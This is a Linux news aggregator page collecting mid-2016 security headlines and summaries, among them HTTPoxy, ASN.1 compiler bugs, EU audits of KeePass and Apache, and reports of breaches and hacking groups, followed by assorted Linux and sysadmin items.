Language Selection

English French German Italian Portuguese Spanish

Security

Security Leftovers

Filed under
Security

OpenBSD 6.0 tightens security by losing Linux compatibility

Filed under
Security
BSD

OpenBSD, one of the more prominent variants of the BSD family of Unix-like operating systems, will be released at the beginning of September, according to a note on the official OpenBSD website.

Often touted as an alternative to Linux. OpenBSD is known for the lack of proprietary influence on its software and has garnered a reputation for shipping with better default security than other OSes and for being highly vigilant (some might say strident) about the safety of its users. Many software router/firewall projects are based on OpenBSD because of its security-conscious development process.

Read more

Security News

Filed under
Security

Security News

Filed under
Security
  • As a blockchain-based project teeters, questions about the technology’s security

    There’s no shortage of futurists, industry analysts, entrepreneurs and IT columnists who in the past year have churned out reports, articles and books touting blockchain-based ledgers as the next technology that will run the world.

  • Fix Bugs, Go Fast, and Update: 3 Approaches to Container Security

    Containers are becoming the central piece of the future of IT. Linux has had containers for ages, but they are still maturing as a technology to be used in production or mission-critical enterprise scenarios. With that, security is becoming a central theme around containers. There are many proposed solutions to the problem, including identifying exactly what technology is in place, fixing known bugs, restricting change, and generally implementing sound security policies. This article looks at these issues and how organizations can adapt their approach to security to keep pace with the rapid evolution of containers.

  • Preventing the next Heartbleed and making FOSS more secure [Ed: Preventing the next Microsoft-connected trademarked bug for FOSS and making FOSS more secure from Microsoft FUD]

    David Wheeler is a long-time leader in advising and working with the U.S. government on issues related to open source software. His personal webpage is a frequently cited source on open standards, open source software, and computer security. David is leading a new project, the CII Best Practices Badging project, which is part of the Linux Foundation's Core Infrastructure Initiative (CII) for strengthening the security of open source software. In this interview he talks about what it means for both government and other users.

Keeweb A Linux Password Manager

Filed under
Linux
Reviews
Security

Today we are depending on more and more online services. Each online service we sign up for, let us set a password and this way we have to remember hundreds of passwords. In this case, it is easy for anyone to forget passwords. In this article I am going to talk about Keeweb, a Linux password manager that can store all your passwords securely either online or offline.

Read<br />
more

Security News

Filed under
Security
  • Security updates for Thursday
  • Open Source Information Security Tool Aimed at MSSPs

    A Virginia software developer announced today the release of what’s billed as the first open source information security analytics tool for managed security services providers (MSSP) and enterprise.

    IKANOW says its new platform features multi-tenancy, enterprise scalability and is fully customizable.

  • Most companies still can't spot incoming cyberattacks

    Four out of five businesses lack the required infrastructure or security professionals with relevant skills to spot and defend against incoming cyberattacks.

    According to a new report by US cybersecurity and privacy think tank Ponemon Institute on behalf of cybersecurity firm BrandProtect, 79 percent of cybersecurity professionals say that their organisations are struggling to monitor the internet for the external threats posed by hackers and cybercriminals.

  • HTTpoxy Flaw Re-emerges After 15 Years and Gets Fixed

    After lying dormant for years, flaws in the HTTP Proxy header used in programming languages and applications, such as PHP, Go and Python, have now been fixed.
    Some flaws take longer—a lot longer—than others to get fixed. The newly named HTTpoxy vulnerability was first discovered back in March 2001 and fixed in the open-source Perl programming language, but it has sat dormant in multiple other languages and applications until July 18.

    The HTTPoxy flaw is a misconfiguration vulnerability in the HTTP_PROXY variable that is commonly used by Common Gateway Interface (CGI) environment scripts. The HTTPoxy flaw could potentially enable a remotely exploitable vulnerability on servers, enabling an attacker to run code or redirect traffic. The flaw at its core is a name space conflict between two different uses for a server variable known as HTTP Proxy.

  • Hack The World

    Currently HackerOne has 550+ customers, has paid over $8.9 million in bounties, and fixed over 25,000 vulnerabilities, which makes for a safer Internet.

  • EU aims to increase the security of password manager and web server software: KeePass and Apache chosen for open source audits [“pyrrhic because of Keepass : flushing the audit money down the toilet on MS based cruft” -iophk]

    For the FOSSA pilot project to improve the security of open source software that my colleague Max and I proposed, the European Commission sought your input on which tools to audit.

    The results are now in: The two overwhelming public favorites were KeePass (23%) and the Apache HTTP Server (19%). The EU has decided to follow these recommendations and audit both of these software projects for potential security issues.

  • KeeThief – A Case Study in Attacking KeePass Part 2

    The other week I published the “A Case Study in Attacking KeePass” post detailing a few notes on how to operationally “attack” KeePass installations. This generated an unexpected amount of responses, most good, but a few negative and dismissive. Some comments centered around the mentality of “if an attacker has code execution on your system you’re screwed already so who cares“. Our counterpoint to this is that protecting your computer from malicious compromise is a very different problem when it’s joined to a domain versus isolated for home use. As professional pentesters/red teamers we’re highly interested in post-exploitation techniques applicable to enterprise environments, which is why we started looking into ways to “attack” KeePass installations in the first place. Our targets are not isolated home users.

  • Giuliani calls for cybersecurity push

    Former New York mayor Rudy Giuliani made a surprise appearance at the BlackBerry Security Summit, warning of the rapid growth of cybercrime and cyberterrorism.

    Cybercrime and cyberterrorism are both growing at rates between 20% and 40%, said Giuliani, who made a brief return from the Republican National Convention in Cleveland to speak at BlackBerry's New York event.

    "Think of it like cancer. We can't cure it... but if we catch it early we can put it into remission," he said. The quicker you can spot an attack, the less chance there is of loss.

  • Notorious Hacker ‘Phineas Fisher’ Says He Hacked The Turkish Government

    A notorious hacker has claimed responsibility for hacking Turkey’s ruling party, the AKP, and stealing more than 300,000 internal emails and other files.

    The hacker, who’s known as Phineas Fisher and has gained international attention for his previous attacks on the surveillance tech companies FinFisher and Hacking Team, took credit for breaching the servers of Turkey’s ruling party, the Justice and Development Party or AKP.

    “I hacked AKP,” Phineas Fisher, who also goes by the nickname Hack Back, said in a message he spread through his Twitter account on Wednesday evening.

Security News

Filed under
Security

EC to audit Apache HTTP Server and Keepass

Filed under
Security

The European Commission is preparing a software source code security audit on two software solutions, Apache HTTP server and Keepass, a password manager. The source code will be analysed and tested for potential security problems, and the results will be shared with the software developers. The audits will start in the coming weeks.

Read more

Security News

Filed under
Security
  • Security advisories for Tuesday
  • BlackBerry Inks Software Deal With U.S. Senate
  • BlackBerry inks security software deals, shares slip
  • BlackBerry Announces String of Small Security Software Deals
  • BlackBerry inks U.S. government software deals; shares slip
  • Carbanak Gang Tied to Russian Security Firm?

    Among the more plunderous cybercrime gangs is a group known as “Carbanak,” Eastern European hackers blamed for stealing more than a billion dollars from banks. Today we’ll examine some compelling clues that point to a connection between the Carbanak gang’s staging grounds and a Russian security firm that claims to work with some of the world’s largest brands in cybersecurity.

    The Carbanak gang derives its name from the banking malware used in countless high-dollar cyberheists. The gang is perhaps best known for hacking directly into bank networks using poisoned Microsoft Office files, and then using that access to force bank ATMs into dispensing cash. Russian security firm Kaspersky Lab estimates that the Carbanak Gang has likely stolen upwards of USD $1 billion — but mostly from Russian banks.

  • Now you can ask Twitter directly to verify your account

    Do you have an army of imposters online pretending to be you? Probably not, but now you can still request for a verified Twitter account.

    On Tuesday, Twitter launched an official application process so that any account can be verified and receive a blue checkmark badge next to its username. Twitter users interested in applying should have a verified phone number and email address, as well as a profile photo that reflects the person or company branding.

    Verified accounts get to filter their mentions to only see those from other verified accounts. But that seems to be the only real feature or perk that comes from having a blue badge–aside from bragging rights, of course. Additionally, verified accounts can’t be private, and the username must remain the same or you will have to seek verification all over again. If you are rejected, you can reapply after 30 days. Previously, the verification process was never clear-cut, and it seemed to require a direct connection to a Twitter rep.

  • Software flaw puts mobile phones and networks at risk of complete takeover [Ed: proprietary software]

    A newly disclosed vulnerability could allow attackers to seize control of mobile phones and key parts of the world's telecommunications infrastructure and make it possible to eavesdrop or disrupt entire networks, security experts warned Tuesday.

    The bug resides in a code library used in a wide range of telecommunication products, including radios in cell towers, routers, and switches, as well as the baseband chips in individual phones. Although exploiting the heap overflow vulnerability would require great skill and resources, attackers who managed to succeed would have the ability to execute malicious code on virtually all of those devices. The code library was developed by Pennsylvania-based Objective Systems and is used to implement a telephony standard known as ASN.1, short for Abstract Syntax Notation One.

Security News

Filed under
Security
  • Ubuntu forum breach traced to neglected plugin
  • Canonical warns users after Ubuntu forum data breach
  • Flaw in vBulletin add-on leads to Ubuntu Forums database breach
  • CrypTech — Internet Engineers’ New Open Source Weapon Against ‘Creepy’ Governments

    The CrypTech project is an independent security hardware development effort that consists of an international team. CrypTech Alpha is an open source crypto-vault that stores the private/public keys and separates the digital certificates from the software using them. It has been developed as a hardware secure module (HSM) to make the implementation of strong cryptography easier.

  • Entrepreneur in £10m swoop for hacking team

    One of the northwest’s best-known entrepreneurs has splashed out about £10m on a cyber-security venture that helps businesses repel hackers.

    Lawrence Jones, who runs the Manchester-based internet hosting and cloud computing specialist UKFast, has bought Pentest, an “ethical hacking” firm whose staff help detect flaws in clients’ cyber-defences.

    Jones, 47, will merge Pentest’s 45 staff into his own cyber-security outfit, Secarma. “It’s become obvious that there is a massive need to put emphasis on cyber-security,” said the internet tycoon, whose wealth is calculated by The Sunday Times Rich List as £275m.

  • Guilt by ASN: Compiler's bad memory bug could sting mobes, cell towers

    A vulnerability in a widely used ASN.1 compiler isn't a good thing: it means a bunch of downstream systems – including mobile phones and cell towers – will inherit the bug.

    And an ASN.1 bug is what the Sadosky Foundation in Argentina has turned up, in Objective Systems' software.

    The research group's Lucas Molas says Objective's ASN1C compiler for C/C++ version 7.0.0 (other builds are probably affected) generates code that suffers from heap memory corruption. This could be potentially exploited to run malware on machines and devices that run the vulnerable compiler output or interfere with their operation.

Syndicate content

More in Tux Machines

Chakra GNU/Linux Users Get KDE Plasma 5.7.2, Qt 5.7 and KDE Applications 16.04.3

Chakra GNU/Linux developer Neofytos Kolokotronis today, July 25, 2016, announced the release of the latest KDE and Qt technologies, along with new software versions in the main repositories of the Linux kernel-based operating system. Read more

In a Quiet Market for PCs, Chromebooks are Marching Steadily Forward

It's no secret that Chrome OS has not been the same striking success for Google that the Android OS has been. And yet, Chromebooks--portable computers running the platform--have not only found their niche, but they are also introducing a new generation to cloud computing. Chromebooks are firmly entrenched in the education market, where many young users have become used to the convention of storing apps and data in the cloud. Now, according to new research from Gartner, Chromebooks are ready to hit new milestones. Analysts there report that Chromebook shipment growth will be in the double digits this year. At the same time, though, Chromebooks have not become fixtures in the enterprise, replacing Windows PCs. Read more

Server Administration

  • SysAdmins With Open Source Skills Are In Demand
    System administrators play a crucial role in businesses today. They are the individuals responsible for the configuration, support and maintenance of company computer systems and servers. For this reason, they are a popular hiring request, with defense and media companies alike looking for these professionals on Dice. Yet, despite the ongoing demand, finding and recruiting system administrators may be more of a challenge. Data from the U.S. Bureau of Labor Statistics (BLS) found that the quarterly unemployment rate for system administrators was 0.6%, well below the national quarterly average (4.9%) and the quarterly average for all tech professionals (2.1%). Employers thus need to focus more of their recruitment strategies on poaching this talent from competitors.
  • One Phrase Sysadmins Hate to Hear (And How to Avoid It)
    A few years later, sysarmy, the local IT community, was born as the "Support for those who give support." And in that spirit, for this 8th AdminFest edition, we want to do exactly that: support those who help others in our Q&A platform, sysarmy.com/help. Each 500 points a participant earns, he/she gets a free drink in return!
  • DevOps'n the Operating System
    John Willis takes a brief look at the history of how Devops principles and operating systems have converged. He spends most of the time forward looking at what and how unikernels will converge with Devops tools, processes and culture. He ends with a demo of how containers, unikernels and Devops ideas can work together in the future.
  • 5 reasons system administrators should use revision control
    Whether you're still using Subversion (SVN), or have moved to a distributed system like Git, revision control has found its place in modern operations infrastructures. If you listen to talks at conferences and see what new companies are doing, it can be easy to assume that everyone is now using revision control, and using it effectively. Unfortunately that's not the case. I routinely interact with organizations who either don't track changes in their infrastructure at all, or are not doing so in an effective manner. If you're looking for a way to convince your boss to spend the time to set it up, or are simply looking for some tips to improve how use it, the following are five tips for using revision control in operations.

Kernel Space/Linux